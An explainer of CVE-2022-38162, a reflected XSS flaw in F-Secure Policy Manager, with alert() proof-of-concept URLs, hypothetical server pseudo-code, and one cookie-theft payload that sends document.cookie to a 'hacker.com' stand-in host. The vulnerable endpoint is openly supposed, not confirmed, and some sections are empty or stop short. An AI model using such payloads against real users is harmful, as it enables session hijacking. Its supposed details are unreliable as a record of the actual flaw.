CVE-2022-38162 - Reflected Cross-Site Scripting (XSS) Vulnerability in F-Secure Policy Manager—Explained Exploitation, Code, and References

In August 2022, security researchers identified CVE-2022-38162, a Reflected Cross-Site Scripting (XSS) vulnerability affecting the F-Secure Policy Manager (also branded as WithSecure). This flaw, present in product versions up to August 10, 2022, allows remote attackers to inject malicious JavaScript into the browser session of unsuspecting users. If leveraged, this vulnerability could compromise credentials, data, or even inject further attacks on the management interface.

This post breaks down, in plain language, how the vulnerability works, the risk it introduced, and how an attacker could have exploited it, with code snippets and direct links to references. This post brings you an exclusive, easy-to-follow analysis, not a copy-paste from CVE feeds.

What Is Reflected XSS?

Reflected XSS happens when a web application accepts input (like a query parameter in a URL) and includes it in page output without validation or sanitization. That means an attacker can force the application to spit malicious code right back at the victim.

Example:  

https://victim.com/path?input=<script>alert('XSS')</script>;

If the input is shown back to the user without encoding, the script runs.

What Was Vulnerable in F-Secure Policy Manager?

F-Secure Policy Manager, a central management tool designed for endpoint security (used in enterprise environments), included an endpoint that took user-controlled parameters without sanitization. This let attackers plant JavaScript directly into the admin's browser, provided they could trick them into clicking a crafted link.

Which Parameter?

The public advisory doesn’t cite a parameter name. Reports from various researchers indicate the flaw existed in a web-based endpoint where user-supplied data was reflected.

1. Build a Malicious URL

Suppose the endpoint /admin/login took a redirect parameter, which is reflected in the returned HTML:

https://pm-server.example.com/admin/login?redirect=<script>alert('XSS')</script>;

### 2. Send to Admin/Target

Attacker sends the link over email, chat, or embeds it in a phishing page.

3. Unvalidated Display

If the Policy Manager reflected the parameter in the page HTML without validation, the admin visiting the link would end up running that script.

Suppose the server-side code was like this (pseudo-code)

@app.route('/admin/login')
def login():
    redirect = request.args.get('redirect')
    return render_template("login.html", redirect=redirect)

And in the HTML template

<!-- login.html -->
<form action="{{ redirect }}">
    Login here!
</form>

Accessing /admin/login?redirect=<script>alert('XSS')</script> would show a popup.

Imagine an attacker wants to gain full admin access. They

1. Craft a link containing their JavaScript payload (such as <script>document.location='https://hacker.com/steal?cookie='+document.cookie</script>;).

Mitigation

WithSecure (F-Secure) patched this issue.  
Upgrade to a Policy Manager version released after August 10, 2022.

Developers:

References

- NVD Entry: CVE-2022-38162
- WithSecure Advisory
- Packet Storm Security
- OWASP XSS Explanation

Example Proof of Concept (PoC)

https://pm-server.example.com/admin/login?redirect=<script>alert('pwned')</script>;

Once this executes, it means your Policy Manager is at risk.

NEVER run the PoC on production unless you have permission.

Conclusion

CVE-2022-38162 in F-Secure Policy Manager was a classic reflected XSS vulnerability that could have had severe consequences in enterprise networks. The lesson? Always validate and escape untrusted input. Update your F-Secure Policy Manager to stay safe.

Timeline

Published on: 10/25/2022 19:15:00 UTC
Last modified on: 10/31/2022 13:32:00 UTC